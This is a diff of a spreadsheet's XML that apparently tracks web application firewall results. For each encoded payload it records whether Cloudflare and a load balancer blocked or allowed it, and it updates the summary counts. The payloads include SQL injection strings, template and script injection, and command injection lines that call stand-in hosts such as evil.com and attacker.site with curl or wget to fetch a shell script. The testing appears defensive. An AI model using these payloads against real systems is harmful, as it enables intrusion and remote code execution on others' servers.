--- a/backup_tf_files/ml-training/output/legacy_indirect_vs_direct_5variants.xlsx
+++ b/backup_tf_files/ml-training/output/legacy_indirect_vs_direct_5variants.xlsx
@@ -15969,7 +15969,6 @@
         </is>
       </c>
     </row>
-    <row r="347"/>
     <row r="348">
       <c r="A348" s="8" t="inlineStr">
         <is>
@@ -23677,7 +23676,6 @@
         </is>
       </c>
     </row>
-    <row r="347"/>
     <row r="348">
       <c r="A348" s="8" t="inlineStr">
         <is>
@@ -31385,7 +31383,6 @@
         </is>
       </c>
     </row>
-    <row r="347"/>
     <row r="348">
       <c r="A348" s="8" t="inlineStr">
         <is>
@@ -39093,7 +39090,6 @@
         </is>
       </c>
     </row>
-    <row r="347"/>
     <row r="348">
       <c r="A348" s="8" t="inlineStr">
         <is>

--- a/backup_tf_files/ml-training/output/legacy_indirect_vs_direct_5variants.xlsx
+++ b/backup_tf_files/ml-training/output/legacy_indirect_vs_direct_5variants.xlsx
@@ -28,7 +28,7 @@
 <file path=xl/styles.xml><?xml version="1.0" encoding="utf-8"?>
 <styleSheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main">
   <numFmts count="0"/>
-  <fonts count="4">
+  <fonts count="5">
     <font>
       <name val="Calibri"/>
       <family val="2"/>
@@ -46,6 +46,10 @@
     </font>
     <font>
       <b val="1"/>
+    </font>
+    <font>
+      <i val="1"/>
+      <color rgb="00808080"/>
     </font>
   </fonts>
   <fills count="6">
@@ -92,7 +96,7 @@
   <cellStyleXfs count="1">
     <xf numFmtId="0" fontId="0" fillId="0" borderId="0"/>
   </cellStyleXfs>
-  <cellXfs count="11">
+  <cellXfs count="12">
     <xf numFmtId="0" fontId="0" fillId="0" borderId="0" pivotButton="0" quotePrefix="0" xfId="0"/>
     <xf numFmtId="0" fontId="1" fillId="2" borderId="0" applyAlignment="1" pivotButton="0" quotePrefix="0" xfId="0">
       <alignment horizontal="center" vertical="center" wrapText="1"/>
@@ -114,6 +118,7 @@
     <xf numFmtId="0" fontId="0" fillId="5" borderId="0" applyAlignment="1" pivotButton="0" quotePrefix="0" xfId="0">
       <alignment vertical="top" wrapText="1"/>
     </xf>
+    <xf numFmtId="0" fontId="4" fillId="3" borderId="0" pivotButton="0" quotePrefix="0" xfId="0"/>
   </cellXfs>
   <cellStyles count="1">
     <cellStyle name="Normal" xfId="0" builtinId="0" hidden="0"/>
@@ -539,13 +544,13 @@
         <v>144</v>
       </c>
       <c r="C3" s="3" t="n">
-        <v>145</v>
+        <v>146</v>
       </c>
       <c r="D3" s="3" t="n">
         <v>7</v>
       </c>
       <c r="E3" s="4" t="n">
-        <v>48</v>
+        <v>47</v>
       </c>
       <c r="F3" t="n">
         <v>344</v>
@@ -561,13 +566,13 @@
         <v>151</v>
       </c>
       <c r="C4" s="3" t="n">
-        <v>110</v>
+        <v>141</v>
       </c>
       <c r="D4" s="3" t="n">
         <v>0</v>
       </c>
       <c r="E4" s="4" t="n">
-        <v>83</v>
+        <v>52</v>
       </c>
       <c r="F4" t="n">
         <v>344</v>
@@ -580,16 +585,16 @@
         </is>
       </c>
       <c r="B5" s="2" t="n">
-        <v>150</v>
+        <v>145</v>
       </c>
       <c r="C5" s="3" t="n">
-        <v>110</v>
+        <v>139</v>
       </c>
       <c r="D5" s="3" t="n">
-        <v>1</v>
+        <v>6</v>
       </c>
       <c r="E5" s="4" t="n">
-        <v>83</v>
+        <v>54</v>
       </c>
       <c r="F5" t="n">
         <v>344</v>
@@ -602,16 +607,16 @@
         </is>
       </c>
       <c r="B6" s="2" t="n">
-        <v>151</v>
+        <v>137</v>
       </c>
       <c r="C6" s="3" t="n">
-        <v>110</v>
+        <v>136</v>
       </c>
       <c r="D6" s="3" t="n">
-        <v>0</v>
+        <v>14</v>
       </c>
       <c r="E6" s="4" t="n">
-        <v>83</v>
+        <v>57</v>
       </c>
       <c r="F6" t="n">
         <v>344</v>
@@ -620,10 +625,10 @@
     <row r="7">
       <c r="A7" t="inlineStr">
         <is>
-          <t>GET-Header</t>
-        </is>
-      </c>
-      <c r="B7" s="2" t="n">
+          <t>GET-Header (stale - Wave1 still old data)</t>
+        </is>
+      </c>
+      <c r="B7" s="11" t="n">
         <v>151</v>
       </c>
       <c r="C7" s="3" t="n">
@@ -1848,9 +1853,9 @@
           <t>%2527%2520OR%25201%253D1--</t>
         </is>
       </c>
-      <c r="C55" s="7" t="inlineStr">
-        <is>
-          <t>CF_ALLOW_ALB_ALLOW</t>
+      <c r="C55" s="6" t="inlineStr">
+        <is>
+          <t>CF_BLOCK</t>
         </is>
       </c>
       <c r="D55" s="7" t="inlineStr">
@@ -1958,9 +1963,9 @@
           <t>%2F%2A%2A%2F</t>
         </is>
       </c>
-      <c r="C60" s="6" t="inlineStr">
-        <is>
-          <t>CF_BLOCK</t>
+      <c r="C60" s="7" t="inlineStr">
+        <is>
+          <t>CF_ALLOW_ALB_ALLOW</t>
         </is>
       </c>
       <c r="D60" s="7" t="inlineStr">
@@ -2354,9 +2359,9 @@
           <t>%2527%2520OR%25201%253D1--+</t>
         </is>
       </c>
-      <c r="C78" s="7" t="inlineStr">
-        <is>
-          <t>CF_ALLOW_ALB_ALLOW</t>
+      <c r="C78" s="6" t="inlineStr">
+        <is>
+          <t>CF_BLOCK</t>
         </is>
       </c>
       <c r="D78" s="7" t="inlineStr">
@@ -2928,7 +2933,7 @@
       </c>
       <c r="C104" s="6" t="inlineStr">
         <is>
-          <t>CF_BLOCK</t>
+          <t>CF_ALLOW_ALB_BLOCK</t>
         </is>
       </c>
       <c r="D104" s="6" t="inlineStr">
@@ -3126,7 +3131,7 @@
       </c>
       <c r="C113" s="6" t="inlineStr">
         <is>
-          <t>CF_BLOCK</t>
+          <t>CF_ALLOW_ALB_BLOCK</t>
         </is>
       </c>
       <c r="D113" s="6" t="inlineStr">
@@ -3256,9 +3261,9 @@
           <t>%2527%2520OR%25201%253D1%2520--</t>
         </is>
       </c>
-      <c r="C119" s="7" t="inlineStr">
-        <is>
-          <t>CF_ALLOW_ALB_ALLOW</t>
+      <c r="C119" s="6" t="inlineStr">
+        <is>
+          <t>CF_BLOCK</t>
         </is>
       </c>
       <c r="D119" s="7" t="inlineStr">
@@ -3388,9 +3393,9 @@
           <t>|curl$\{IFS\}evil.com</t>
         </is>
       </c>
-      <c r="C125" s="6" t="inlineStr">
-        <is>
-          <t>CF_BLOCK</t>
+      <c r="C125" s="7" t="inlineStr">
+        <is>
+          <t>CF_ALLOW_ALB_ALLOW</t>
         </is>
       </c>
       <c r="D125" s="7" t="inlineStr">
@@ -3410,9 +3415,9 @@
           <t>|wget$\{IFS\}attacker.site%2fshell.sh</t>
         </is>
       </c>
-      <c r="C126" s="6" t="inlineStr">
-        <is>
-          <t>CF_BLOCK</t>
+      <c r="C126" s="7" t="inlineStr">
+        <is>
+          <t>CF_ALLOW_ALB_ALLOW</t>
         </is>
       </c>
       <c r="D126" s="7" t="inlineStr">
@@ -3432,9 +3437,9 @@
           <t>%2526%2526whoami</t>
         </is>
       </c>
-      <c r="C127" s="7" t="inlineStr">
-        <is>
-          <t>CF_ALLOW_ALB_ALLOW</t>
+      <c r="C127" s="6" t="inlineStr">
+        <is>
+          <t>CF_BLOCK</t>
         </is>
       </c>
       <c r="D127" s="7" t="inlineStr">
@@ -3454,9 +3459,9 @@
           <t>$\{@print(md5(1234))\}</t>
         </is>
       </c>
-      <c r="C128" s="7" t="inlineStr">
-        <is>
-          <t>CF_ALLOW_ALB_ALLOW</t>
+      <c r="C128" s="6" t="inlineStr">
+        <is>
+          <t>CF_BLOCK</t>
         </is>
       </c>
       <c r="D128" s="7" t="inlineStr">
@@ -3564,9 +3569,9 @@
           <t>%60curl$\{IFS\}attacker.com%60</t>
         </is>
       </c>
-      <c r="C133" s="6" t="inlineStr">
-        <is>
-          <t>CF_BLOCK</t>
+      <c r="C133" s="7" t="inlineStr">
+        <is>
+          <t>CF_ALLOW_ALB_ALLOW</t>
         </is>
       </c>
       <c r="D133" s="7" t="inlineStr">
@@ -3586,9 +3591,9 @@
           <t>';`wget attacker.sh`;//</t>
         </is>
       </c>
-      <c r="C134" s="6" t="inlineStr">
-        <is>
-          <t>CF_BLOCK</t>
+      <c r="C134" s="7" t="inlineStr">
+        <is>
+          <t>CF_ALLOW_ALB_ALLOW</t>
         </is>
       </c>
       <c r="D134" s="7" t="inlineStr">
@@ -3718,9 +3723,9 @@
           <t>| powershell -Command "whoami"</t>
         </is>
       </c>
-      <c r="C140" s="6" t="inlineStr">
-        <is>
-          <t>CF_BLOCK</t>
+      <c r="C140" s="7" t="inlineStr">
+        <is>
+          <t>CF_ALLOW_ALB_ALLOW</t>
         </is>
       </c>
       <c r="D140" s="7" t="inlineStr">
@@ -3762,9 +3767,9 @@
           <t>$\{@print(md5(1))\}</t>
         </is>
       </c>
-      <c r="C142" s="7" t="inlineStr">
-        <is>
-          <t>CF_ALLOW_ALB_ALLOW</t>
+      <c r="C142" s="6" t="inlineStr">
+        <is>
+          <t>CF_BLOCK</t>
         </is>
       </c>
       <c r="D142" s="7" t="inlineStr">
@@ -7086,7 +7091,7 @@
       </c>
       <c r="C293" s="6" t="inlineStr">
         <is>
-          <t>CF_BLOCK</t>
+          <t>CF_ALLOW_ALB_BLOCK</t>
         </is>
       </c>
       <c r="D293" s="6" t="inlineStr">
@@ -7108,7 +7113,7 @@
       </c>
       <c r="C294" s="6" t="inlineStr">
         <is>
-          <t>CF_BLOCK</t>
+          <t>CF_ALLOW_ALB_BLOCK</t>
         </is>
       </c>
       <c r="D294" s="6" t="inlineStr">
@@ -7436,9 +7441,9 @@
           <t>%2527%2520OR%25201=1--</t>
         </is>
       </c>
-      <c r="C309" s="7" t="inlineStr">
-        <is>
-          <t>CF_ALLOW_ALB_ALLOW</t>
+      <c r="C309" s="6" t="inlineStr">
+        <is>
+          <t>CF_BLOCK</t>
         </is>
       </c>
       <c r="D309" s="7" t="inlineStr">
@@ -8308,11 +8313,11 @@
         </is>
       </c>
       <c r="B351" t="n">
-        <v>145</v>
+        <v>146</v>
       </c>
       <c r="C351" t="inlineStr">
         <is>
-          <t>42.2%</t>
+          <t>42.4%</t>
         </is>
       </c>
     </row>
@@ -8338,11 +8343,11 @@
         </is>
       </c>
       <c r="B353" t="n">
-        <v>48</v>
+        <v>47</v>
       </c>
       <c r="C353" t="inlineStr">
         <is>
-          <t>14.0%</t>
+          <t>13.7%</t>
         </is>
       </c>
     </row>
@@ -9490,9 +9495,9 @@
           <t>%27%20OR%201=1--</t>
         </is>
       </c>
-      <c r="C52" s="7" t="inlineStr">
-        <is>
-          <t>CF_ALLOW_ALB_ALLOW</t>
+      <c r="C52" s="6" t="inlineStr">
+        <is>
+          <t>CF_BLOCK</t>
         </is>
       </c>
       <c r="D52" s="7" t="inlineStr">
@@ -9512,9 +9517,9 @@
           <t>%27%20OR%20%271%27=%271</t>
         </is>
       </c>
-      <c r="C53" s="7" t="inlineStr">
-        <is>
-          <t>CF_ALLOW_ALB_ALLOW</t>
+      <c r="C53" s="6" t="inlineStr">
+        <is>
+          <t>CF_BLOCK</t>
         </is>
       </c>
       <c r="D53" s="7" t="inlineStr">
@@ -9534,9 +9539,9 @@
           <t>%27%20OR%20%271%27=%271%27--</t>
         </is>
       </c>
-      <c r="C54" s="7" t="inlineStr">
-        <is>
-          <t>CF_ALLOW_ALB_ALLOW</t>
+      <c r="C54" s="6" t="inlineStr">
+        <is>
+          <t>CF_BLOCK</t>
         </is>
       </c>
       <c r="D54" s="7" t="inlineStr">
@@ -9578,9 +9583,9 @@
           <t>%27OR+1%3D1--</t>
         </is>
       </c>
-      <c r="C56" s="7" t="inlineStr">
-        <is>
-          <t>CF_ALLOW_ALB_ALLOW</t>
+      <c r="C56" s="6" t="inlineStr">
+        <is>
+          <t>CF_BLOCK</t>
         </is>
       </c>
       <c r="D56" s="7" t="inlineStr">
@@ -9600,9 +9605,9 @@
           <t>%27+OR+1%3D1--</t>
         </is>
       </c>
-      <c r="C57" s="7" t="inlineStr">
-        <is>
-          <t>CF_ALLOW_ALB_ALLOW</t>
+      <c r="C57" s="6" t="inlineStr">
+        <is>
+          <t>CF_BLOCK</t>
         </is>
       </c>
       <c r="D57" s="7" t="inlineStr">
@@ -9688,9 +9693,9 @@
           <t>%27)%20OR%20(%271%27=%271</t>
         </is>
       </c>
-      <c r="C61" s="7" t="inlineStr">
-        <is>
-          <t>CF_ALLOW_ALB_ALLOW</t>
+      <c r="C61" s="6" t="inlineStr">
+        <is>
+          <t>CF_BLOCK</t>
         </is>
       </c>
       <c r="D61" s="7" t="inlineStr">
@@ -9842,9 +9847,9 @@
           <t>%27%20OR%201%3D1%20--%20</t>
         </is>
       </c>
-      <c r="C68" s="7" t="inlineStr">
-        <is>
-          <t>CF_ALLOW_ALB_ALLOW</t>
+      <c r="C68" s="6" t="inlineStr">
+        <is>
+          <t>CF_BLOCK</t>
         </is>
       </c>
       <c r="D68" s="7" t="inlineStr">
@@ -9864,9 +9869,9 @@
           <t>%27)%20OR%20('1'%3D'1</t>
         </is>
       </c>
-      <c r="C69" s="7" t="inlineStr">
-        <is>
-          <t>CF_ALLOW_ALB_ALLOW</t>
+      <c r="C69" s="6" t="inlineStr">
+        <is>
+          <t>CF_BLOCK</t>
         </is>
       </c>
       <c r="D69" s="7" t="inlineStr">
@@ -9886,9 +9891,9 @@
           <t>%25%27%20OR%20%271%27%3D%271</t>
         </is>
       </c>
-      <c r="C70" s="7" t="inlineStr">
-        <is>
-          <t>CF_ALLOW_ALB_ALLOW</t>
+      <c r="C70" s="6" t="inlineStr">
+        <is>
+          <t>CF_BLOCK</t>
         </is>
       </c>
       <c r="D70" s="7" t="inlineStr">
@@ -9908,9 +9913,9 @@
           <t>%27%20OR%201=1%20--%20</t>
         </is>
       </c>
-      <c r="C71" s="7" t="inlineStr">
-        <is>
-          <t>CF_ALLOW_ALB_ALLOW</t>
+      <c r="C71" s="6" t="inlineStr">
+        <is>
+          <t>CF_BLOCK</t>
         </is>
       </c>
       <c r="D71" s="7" t="inlineStr">
@@ -9930,9 +9935,9 @@
           <t>%27%20UNION%20SELECT%201,2,3--</t>
         </is>
       </c>
-      <c r="C72" s="7" t="inlineStr">
-        <is>
-          <t>CF_ALLOW_ALB_ALLOW</t>
+      <c r="C72" s="6" t="inlineStr">
+        <is>
+          <t>CF_BLOCK</t>
         </is>
       </c>
       <c r="D72" s="7" t="inlineStr">
@@ -9974,9 +9979,9 @@
           <t>admin%27%2f%2a%2a%2f--</t>
         </is>
       </c>
-      <c r="C74" s="7" t="inlineStr">
-        <is>
-          <t>CF_ALLOW_ALB_ALLOW</t>
+      <c r="C74" s="6" t="inlineStr">
+        <is>
+          <t>CF_BLOCK</t>
         </is>
       </c>
       <c r="D74" s="7" t="inlineStr">
@@ -10018,9 +10023,9 @@
           <t>%27%2bOR%2b1%3d1--</t>
         </is>
       </c>
-      <c r="C76" s="7" t="inlineStr">
-        <is>
-          <t>CF_ALLOW_ALB_ALLOW</t>
+      <c r="C76" s="6" t="inlineStr">
+        <is>
+          <t>CF_BLOCK</t>
         </is>
       </c>
       <c r="D76" s="7" t="inlineStr">
@@ -10040,9 +10045,9 @@
           <t>%60%27%20OR%201=1--</t>
         </is>
       </c>
-      <c r="C77" s="7" t="inlineStr">
-        <is>
-          <t>CF_ALLOW_ALB_ALLOW</t>
+      <c r="C77" s="6" t="inlineStr">
+        <is>
+          <t>CF_BLOCK</t>
         </is>
       </c>
       <c r="D77" s="7" t="inlineStr">
@@ -10084,9 +10089,9 @@
           <t>%27%2b%4f%52%2b1%3d1--+</t>
         </is>
       </c>
-      <c r="C79" s="7" t="inlineStr">
-        <is>
-          <t>CF_ALLOW_ALB_ALLOW</t>
+      <c r="C79" s="6" t="inlineStr">
+        <is>
+          <t>CF_BLOCK</t>
         </is>
       </c>
       <c r="D79" s="7" t="inlineStr">
@@ -10150,9 +10155,9 @@
           <t>0%27%20UNION%20SELECT%20null,null,null--+</t>
         </is>
       </c>
-      <c r="C82" s="7" t="inlineStr">
-        <is>
-          <t>CF_ALLOW_ALB_ALLOW</t>
+      <c r="C82" s="6" t="inlineStr">
+        <is>
+          <t>CF_BLOCK</t>
         </is>
       </c>
       <c r="D82" s="7" t="inlineStr">
@@ -10480,9 +10485,9 @@
           <t>%27%20OR%20%271%27%3D%271</t>
         </is>
       </c>
-      <c r="C97" s="7" t="inlineStr">
-        <is>
-          <t>CF_ALLOW_ALB_ALLOW</t>
+      <c r="C97" s="6" t="inlineStr">
+        <is>
+          <t>CF_BLOCK</t>
         </is>
       </c>
       <c r="D97" s="7" t="inlineStr">
@@ -10502,9 +10507,9 @@
           <t>1%27%20AND%201%3D1%20--</t>
         </is>
       </c>
-      <c r="C98" s="7" t="inlineStr">
-        <is>
-          <t>CF_ALLOW_ALB_ALLOW</t>
+      <c r="C98" s="6" t="inlineStr">
+        <is>
+          <t>CF_BLOCK</t>
         </is>
       </c>
       <c r="D98" s="7" t="inlineStr">
@@ -10612,9 +10617,9 @@
           <t>1%a0OR%a01=1</t>
         </is>
       </c>
-      <c r="C103" s="7" t="inlineStr">
-        <is>
-          <t>CF_ALLOW_ALB_ALLOW</t>
+      <c r="C103" s="6" t="inlineStr">
+        <is>
+          <t>CF_BLOCK</t>
         </is>
       </c>
       <c r="D103" s="7" t="inlineStr">
@@ -10636,7 +10641,7 @@
       </c>
       <c r="C104" s="6" t="inlineStr">
         <is>
-          <t>CF_BLOCK</t>
+          <t>CF_ALLOW_ALB_BLOCK</t>
         </is>
       </c>
       <c r="D104" s="6" t="inlineStr">
@@ -10834,7 +10839,7 @@
       </c>
       <c r="C113" s="6" t="inlineStr">
         <is>
-          <t>CF_BLOCK</t>
+          <t>CF_ALLOW_ALB_BLOCK</t>
         </is>
       </c>
       <c r="D113" s="6" t="inlineStr">
@@ -10920,9 +10925,9 @@
           <t>%27%20OR%201%3D1--+</t>
         </is>
       </c>
-      <c r="C117" s="7" t="inlineStr">
-        <is>
-          <t>CF_ALLOW_ALB_ALLOW</t>
+      <c r="C117" s="6" t="inlineStr">
+        <is>
+          <t>CF_BLOCK</t>
         </is>
       </c>
       <c r="D117" s="7" t="inlineStr">
@@ -11052,9 +11057,9 @@
           <t>%3Bping%20-c%204%20evil.com</t>
         </is>
       </c>
-      <c r="C123" s="7" t="inlineStr">
-        <is>
-          <t>CF_ALLOW_ALB_ALLOW</t>
+      <c r="C123" s="6" t="inlineStr">
+        <is>
+          <t>CF_BLOCK</t>
         </is>
       </c>
       <c r="D123" s="7" t="inlineStr">
@@ -11074,9 +11079,9 @@
           <t>%60whoami%60</t>
         </is>
       </c>
-      <c r="C124" s="7" t="inlineStr">
-        <is>
-          <t>CF_ALLOW_ALB_ALLOW</t>
+      <c r="C124" s="6" t="inlineStr">
+        <is>
+          <t>CF_BLOCK</t>
         </is>
       </c>
       <c r="D124" s="7" t="inlineStr">
@@ -11096,9 +11101,9 @@
           <t>|curl$\{IFS\}evil.com</t>
         </is>
       </c>
-      <c r="C125" s="6" t="inlineStr">
-        <is>
-          <t>CF_BLOCK</t>
+      <c r="C125" s="7" t="inlineStr">
+        <is>
+          <t>CF_ALLOW_ALB_ALLOW</t>
         </is>
       </c>
       <c r="D125" s="7" t="inlineStr">
@@ -11118,9 +11123,9 @@
           <t>|wget$\{IFS\}attacker.site%2fshell.sh</t>
         </is>
       </c>
-      <c r="C126" s="6" t="inlineStr">
-        <is>
-          <t>CF_BLOCK</t>
+      <c r="C126" s="7" t="inlineStr">
+        <is>
+          <t>CF_ALLOW_ALB_ALLOW</t>
         </is>
       </c>
       <c r="D126" s="7" t="inlineStr">
@@ -11162,9 +11167,9 @@
           <t>$\{@print(md5(1234))\}</t>
         </is>
       </c>
-      <c r="C128" s="7" t="inlineStr">
-        <is>
-          <t>CF_ALLOW_ALB_ALLOW</t>
+      <c r="C128" s="6" t="inlineStr">
+        <is>
+          <t>CF_BLOCK</t>
         </is>
       </c>
       <c r="D128" s="7" t="inlineStr">
@@ -11294,9 +11299,9 @@
           <t>';`wget attacker.sh`;//</t>
         </is>
       </c>
-      <c r="C134" s="6" t="inlineStr">
-        <is>
-          <t>CF_BLOCK</t>
+      <c r="C134" s="7" t="inlineStr">
+        <is>
+          <t>CF_ALLOW_ALB_ALLOW</t>
         </is>
       </c>
       <c r="D134" s="7" t="inlineStr">
@@ -11426,9 +11431,9 @@
           <t>| powershell -Command "whoami"</t>
         </is>
       </c>
-      <c r="C140" s="6" t="inlineStr">
-        <is>
-          <t>CF_BLOCK</t>
+      <c r="C140" s="7" t="inlineStr">
+        <is>
+          <t>CF_ALLOW_ALB_ALLOW</t>
         </is>
       </c>
       <c r="D140" s="7" t="inlineStr">
@@ -11470,9 +11475,9 @@
           <t>$\{@print(md5(1))\}</t>
         </is>
       </c>
-      <c r="C142" s="7" t="inlineStr">
-        <is>
-          <t>CF_ALLOW_ALB_ALLOW</t>
+      <c r="C142" s="6" t="inlineStr">
+        <is>
+          <t>CF_BLOCK</t>
         </is>
       </c>
       <c r="D142" s="7" t="inlineStr">
@@ -11492,9 +11497,9 @@
           <t>%26%26%20whoami</t>
         </is>
       </c>
-      <c r="C143" s="7" t="inlineStr">
-        <is>
-          <t>CF_ALLOW_ALB_ALLOW</t>
+      <c r="C143" s="6" t="inlineStr">
+        <is>
+          <t>CF_BLOCK</t>
         </is>
       </c>
       <c r="D143" s="7" t="inlineStr">
@@ -12416,9 +12421,9 @@
           <t>new%20Function('alert(1)')()</t>
         </is>
       </c>
-      <c r="C185" s="7" t="inlineStr">
-        <is>
-          <t>CF_ALLOW_ALB_ALLOW</t>
+      <c r="C185" s="6" t="inlineStr">
+        <is>
+          <t>CF_BLOCK</t>
         </is>
       </c>
       <c r="D185" s="7" t="inlineStr">
@@ -12440,7 +12445,7 @@
       </c>
       <c r="C186" s="6" t="inlineStr">
         <is>
-          <t>CF_BLOCK</t>
+          <t>CF_ALLOW_ALB_BLOCK</t>
         </is>
       </c>
       <c r="D186" s="6" t="inlineStr">
@@ -14726,9 +14731,9 @@
           <t>'%09OR%091=1</t>
         </is>
       </c>
-      <c r="C290" s="7" t="inlineStr">
-        <is>
-          <t>CF_ALLOW_ALB_ALLOW</t>
+      <c r="C290" s="6" t="inlineStr">
+        <is>
+          <t>CF_BLOCK</t>
         </is>
       </c>
       <c r="D290" s="7" t="inlineStr">
@@ -14748,9 +14753,9 @@
           <t>'%20oR%201=1--</t>
         </is>
       </c>
-      <c r="C291" s="7" t="inlineStr">
-        <is>
-          <t>CF_ALLOW_ALB_ALLOW</t>
+      <c r="C291" s="6" t="inlineStr">
+        <is>
+          <t>CF_BLOCK</t>
         </is>
       </c>
       <c r="D291" s="7" t="inlineStr">
@@ -14794,7 +14799,7 @@
       </c>
       <c r="C293" s="6" t="inlineStr">
         <is>
-          <t>CF_BLOCK</t>
+          <t>CF_ALLOW_ALB_BLOCK</t>
         </is>
       </c>
       <c r="D293" s="6" t="inlineStr">
@@ -14816,7 +14821,7 @@
       </c>
       <c r="C294" s="6" t="inlineStr">
         <is>
-          <t>CF_BLOCK</t>
+          <t>CF_ALLOW_ALB_BLOCK</t>
         </is>
       </c>
       <c r="D294" s="6" t="inlineStr">
@@ -14902,9 +14907,9 @@
           <t>'%2f**%2fOR%2f**%2f1=1--</t>
         </is>
       </c>
-      <c r="C298" s="7" t="inlineStr">
-        <is>
-          <t>CF_ALLOW_ALB_ALLOW</t>
+      <c r="C298" s="6" t="inlineStr">
+        <is>
+          <t>CF_BLOCK</t>
         </is>
       </c>
       <c r="D298" s="7" t="inlineStr">
@@ -15122,9 +15127,9 @@
           <t>%u0027%20OR%201=1--</t>
         </is>
       </c>
-      <c r="C308" s="7" t="inlineStr">
-        <is>
-          <t>CF_ALLOW_ALB_ALLOW</t>
+      <c r="C308" s="6" t="inlineStr">
+        <is>
+          <t>CF_BLOCK</t>
         </is>
       </c>
       <c r="D308" s="7" t="inlineStr">
@@ -15166,9 +15171,9 @@
           <t>%27UNION%0ASELECT%0ANULL,NULL--</t>
         </is>
       </c>
-      <c r="C310" s="7" t="inlineStr">
-        <is>
-          <t>CF_ALLOW_ALB_ALLOW</t>
+      <c r="C310" s="6" t="inlineStr">
+        <is>
+          <t>CF_BLOCK</t>
         </is>
       </c>
       <c r="D310" s="7" t="inlineStr">
@@ -15298,9 +15303,9 @@
           <t>1+oR+1=1</t>
         </is>
       </c>
-      <c r="C316" s="7" t="inlineStr">
-        <is>
-          <t>CF_ALLOW_ALB_ALLOW</t>
+      <c r="C316" s="6" t="inlineStr">
+        <is>
+          <t>CF_BLOCK</t>
         </is>
       </c>
       <c r="D316" s="7" t="inlineStr">
@@ -15320,9 +15325,9 @@
           <t>1%0bOR%0b1=1</t>
         </is>
       </c>
-      <c r="C317" s="7" t="inlineStr">
-        <is>
-          <t>CF_ALLOW_ALB_ALLOW</t>
+      <c r="C317" s="6" t="inlineStr">
+        <is>
+          <t>CF_BLOCK</t>
         </is>
       </c>
       <c r="D317" s="7" t="inlineStr">
@@ -15738,9 +15743,9 @@
           <t>%31%27%20--</t>
         </is>
       </c>
-      <c r="C336" s="7" t="inlineStr">
-        <is>
-          <t>CF_ALLOW_ALB_ALLOW</t>
+      <c r="C336" s="6" t="inlineStr">
+        <is>
+          <t>CF_BLOCK</t>
         </is>
       </c>
       <c r="D336" s="7" t="inlineStr">
@@ -15782,9 +15787,9 @@
           <t>%27%2F**%2FOR%2F**%2F1%3D1--</t>
         </is>
       </c>
-      <c r="C338" s="7" t="inlineStr">
-        <is>
-          <t>CF_ALLOW_ALB_ALLOW</t>
+      <c r="C338" s="6" t="inlineStr">
+        <is>
+          <t>CF_BLOCK</t>
         </is>
       </c>
       <c r="D338" s="7" t="inlineStr">
@@ -15969,6 +15974,7 @@
         </is>
       </c>
     </row>
+    <row r="347"/>
     <row r="348">
       <c r="A348" s="8" t="inlineStr">
         <is>
@@ -16015,11 +16021,11 @@
         </is>
       </c>
       <c r="B351" t="n">
-        <v>110</v>
+        <v>141</v>
       </c>
       <c r="C351" t="inlineStr">
         <is>
-          <t>32.0%</t>
+          <t>41.0%</t>
         </is>
       </c>
     </row>
@@ -16045,11 +16051,11 @@
         </is>
       </c>
       <c r="B353" t="n">
-        <v>83</v>
+        <v>52</v>
       </c>
       <c r="C353" t="inlineStr">
         <is>
-          <t>24.1%</t>
+          <t>15.1%</t>
         </is>
       </c>
     </row>
@@ -17197,9 +17203,9 @@
           <t>%27%20OR%201=1--</t>
         </is>
       </c>
-      <c r="C52" s="7" t="inlineStr">
-        <is>
-          <t>CF_ALLOW_ALB_ALLOW</t>
+      <c r="C52" s="6" t="inlineStr">
+        <is>
+          <t>CF_BLOCK</t>
         </is>
       </c>
       <c r="D52" s="7" t="inlineStr">
@@ -17219,9 +17225,9 @@
           <t>%27%20OR%20%271%27=%271</t>
         </is>
       </c>
-      <c r="C53" s="7" t="inlineStr">
-        <is>
-          <t>CF_ALLOW_ALB_ALLOW</t>
+      <c r="C53" s="6" t="inlineStr">
+        <is>
+          <t>CF_BLOCK</t>
         </is>
       </c>
       <c r="D53" s="7" t="inlineStr">
@@ -17241,9 +17247,9 @@
           <t>%27%20OR%20%271%27=%271%27--</t>
         </is>
       </c>
-      <c r="C54" s="7" t="inlineStr">
-        <is>
-          <t>CF_ALLOW_ALB_ALLOW</t>
+      <c r="C54" s="6" t="inlineStr">
+        <is>
+          <t>CF_BLOCK</t>
         </is>
       </c>
       <c r="D54" s="7" t="inlineStr">
@@ -17285,9 +17291,9 @@
           <t>%27OR+1%3D1--</t>
         </is>
       </c>
-      <c r="C56" s="7" t="inlineStr">
-        <is>
-          <t>CF_ALLOW_ALB_ALLOW</t>
+      <c r="C56" s="6" t="inlineStr">
+        <is>
+          <t>CF_BLOCK</t>
         </is>
       </c>
       <c r="D56" s="7" t="inlineStr">
@@ -17307,9 +17313,9 @@
           <t>%27+OR+1%3D1--</t>
         </is>
       </c>
-      <c r="C57" s="7" t="inlineStr">
-        <is>
-          <t>CF_ALLOW_ALB_ALLOW</t>
+      <c r="C57" s="6" t="inlineStr">
+        <is>
+          <t>CF_BLOCK</t>
         </is>
       </c>
       <c r="D57" s="7" t="inlineStr">
@@ -17395,9 +17401,9 @@
           <t>%27)%20OR%20(%271%27=%271</t>
         </is>
       </c>
-      <c r="C61" s="7" t="inlineStr">
-        <is>
-          <t>CF_ALLOW_ALB_ALLOW</t>
+      <c r="C61" s="6" t="inlineStr">
+        <is>
+          <t>CF_BLOCK</t>
         </is>
       </c>
       <c r="D61" s="7" t="inlineStr">
@@ -17549,9 +17555,9 @@
           <t>%27%20OR%201%3D1%20--%20</t>
         </is>
       </c>
-      <c r="C68" s="7" t="inlineStr">
-        <is>
-          <t>CF_ALLOW_ALB_ALLOW</t>
+      <c r="C68" s="6" t="inlineStr">
+        <is>
+          <t>CF_BLOCK</t>
         </is>
       </c>
       <c r="D68" s="7" t="inlineStr">
@@ -17571,9 +17577,9 @@
           <t>%27)%20OR%20('1'%3D'1</t>
         </is>
       </c>
-      <c r="C69" s="7" t="inlineStr">
-        <is>
-          <t>CF_ALLOW_ALB_ALLOW</t>
+      <c r="C69" s="6" t="inlineStr">
+        <is>
+          <t>CF_BLOCK</t>
         </is>
       </c>
       <c r="D69" s="7" t="inlineStr">
@@ -17593,9 +17599,9 @@
           <t>%25%27%20OR%20%271%27%3D%271</t>
         </is>
       </c>
-      <c r="C70" s="7" t="inlineStr">
-        <is>
-          <t>CF_ALLOW_ALB_ALLOW</t>
+      <c r="C70" s="6" t="inlineStr">
+        <is>
+          <t>CF_BLOCK</t>
         </is>
       </c>
       <c r="D70" s="7" t="inlineStr">
@@ -17615,9 +17621,9 @@
           <t>%27%20OR%201=1%20--%20</t>
